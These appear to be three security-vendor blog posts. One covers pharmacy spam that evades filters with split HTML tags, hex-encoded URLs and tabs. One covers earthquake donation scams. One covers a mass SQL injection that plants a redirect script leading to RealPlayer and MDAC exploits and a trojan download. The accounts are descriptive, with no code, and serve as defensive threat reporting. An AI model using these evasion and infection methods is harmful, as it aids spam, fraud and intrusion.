Thirty years after it was first named, spam is still alive and well. Just as well, medicine spam hasn’t lost its kick for spammers.

A spam alert was recently released by the Trend Micro Content Security team regarding spam offering cheap medicine from what seems to be the same Canadian Pharmacy Web site we observed here.

The message uses various spam techniques to evade being filtered out by antispam software. Such techniques include:

• Using HTML tags to break up the spammy words
• Masking the spam link with a very long URL, using hex codes
• Placing tabs in between characters

Antispam Engineers at TrendLabs believe that though each of the employed techniques are not exactly new by themselves, having them combined and used in this specific spam run is indeed noteworthy. It may mean spammers are figuring out spam filtering techniques and are finding ways to work around them.

Below is a screenshot of the spammed message:

The link displayed in the message is a dummy URL, which connects to a Web site different from what is explicitly shown. Clicking the link connects the user to a Canadian Pharmacy Web site that sells cheap medicine such as Cialis and Viagra. Here’s a screenshot of the offending Web site:

No worries, though, our spam definitions recognize this strain inspite of its strategic combination of filter-evasion technqiues.

Most times it is but when faced by true horror do we see the best within ourselves and within others, and also the worst. The depths people are willing to sink into just for money is appalling.

For the longest time no calamity or tragedy has occurred that was not used or in any way exploited by cyber criminals for their own gain. Be it natural calamities like Hurricane Katrina, the California forest wildfire, accidents, political disputes, or tragic deaths.

Recent incidents such as the earthquake in China is no different, and like any other tragedy it has triggered two human instincts that depict the best and worst of human nature: (1) to help, and (2) to take advantage.

Now in the midst of the mourning in Sichuan, another tragedy unfolds as cyber criminals prey on those who yearn to help victims survive this latest dreadful ordeal. In one report scammers sent out text messages enticing people to send donations to fund the aid for helpless victims. And today we were also able to catch a sample of a spam message allegedly from a Filipino seeking financial aid to follow his wounded wife in China.

Here are the first and last portions of the long-winded letter designed to get merciful recipients to take action, i.e. donate money:

Figure 1. The letter starts off as a heart-wrenching plea for help.

Figure 2. The letter ends with the sender’s email address should readers wish to contact him and give him money.

These schemes, much like during those that surfaced during previous tragedies, are surely only some of the many that will continue to use this ploy.

In an even more tragic turn, we came across reports that the official Web site for donations to the eathquake victims in China, the Chinese Red Cross, has itself been hacked to divert donations elsewhere. This irony is startling, as it precludes us from encouraging users to donate only to legitimate organizations.

We thus recommend users to remain extremely cautious in extending their help. Opt for means where they can keep a closer watch of who gets the donation and where it goes.

Barely recovering from the flurry of analysis surrounding the weekend compromise, Trend Micro researchers from Taiwan have yet again discovered a new attack.

The nature of affected sites seem to be quite diverse, although a big chunk belongs to the Asia Pacific region. Hackers have apparently conducted another massive SQL injection attack, causing well over 160,000 Web sites to contain a certain malicious script.

Figure 1. Trend Micro product in action, blocking access to sites containing this script.

Trend Micro detects the script as HTML_IFRAME.NG. When unsuspecting users visit one of these infected pages, they are redirected to any of three URLs containing various exploits. The scripts found in these URLs are detected by Trend Micro as the following:

• JS_REALPLR.CB, which exploits the import method vulnerability in an ActiveX Control in RealPlayer causing stack buffer overflow
• JS_REALPLR.CD which exploits an improper memory management issue in ActiveX, also in RealPlayer
• HTML_AGENT.APAY which downloads another script, JS_DLOADER.JYT

JS_DLOADER.JYT, in turn, exploits the MS Data Access Components (MDAC) vulnerability (as described in Microsoft Security Bulletin MS06-014).

JS_REALPLR.CB, JS_REALPLR.CD and JS_DLOADER.JYT all access a URL in the same domain which downloads 1.exe onto the infected PC. Trend Micro detects 1.exe as TSPY_LINEAGE.PJ (update: the file is now TROJ_AGENT.WPA as of this writing).

The attack algorithm is illustrated below:

Figure 2. Attack algorithm

Users are bound to be infected by the aforementioned malware should their browsers allow automatic execution of ActiveX controls. Since users are viewing legitimate sites, it is highly likely that even when browsers are configured to prompt for ActiveX or script download, users will still agree to download the offered file.

Only a strong Web Threat Protection suite breaks the the infection chain at various points of the attack. This becomes incredibly important considering that the final payload, 1.exe, appears to change with every download. If the user is prevented from accessing URLs which the initial script redirects to in the first place, then the user is effectively protected from whatever threat the final payload may bring.

Note: Our regional partners are now trying to reach the appropriate CERTs of the affected sites. We have also blocked all related malicious domains and detected all malicious files.

Consolidated findings of the Research (Taiwan), Escalation, and Threat Response teams at TrendLabs.